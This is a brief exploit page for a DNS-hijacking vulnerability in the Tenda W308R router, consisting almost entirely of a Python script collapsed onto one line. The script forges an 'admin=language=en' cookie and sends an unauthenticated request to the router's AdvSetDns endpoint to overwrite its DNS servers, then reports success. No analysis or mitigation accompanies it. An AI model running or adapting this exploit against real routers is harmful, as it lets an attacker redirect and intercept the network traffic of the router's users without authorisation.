CVE-2018-25316 Tenda W308R DNS劫持漏洞

import requests # Target IP of the vulnerable router target_url = "http://192.168.0.1/goform/AdvSetDns" # Malicious DNS servers to redirect traffic to malicious_dns_primary = "8.8.8.8" malicious_dns_secondary = "8.8.4.4" # Crafted Cookie based on the vulnerability description # Exploits the session weakness by mimicking an admin language cookie cookies = { "admin": "language=en" } # Payload parameters to change DNS settings payload = { "GO": "AdvSetDns.asp", "D Enable": "1", "D1": malicious_dns_primary, "D2": malicious_dns_secondary } try: # Send unauthenticated GET request response = requests.get(target_url, params=payload, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Exploit sent successfully. DNS settings may have been changed.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")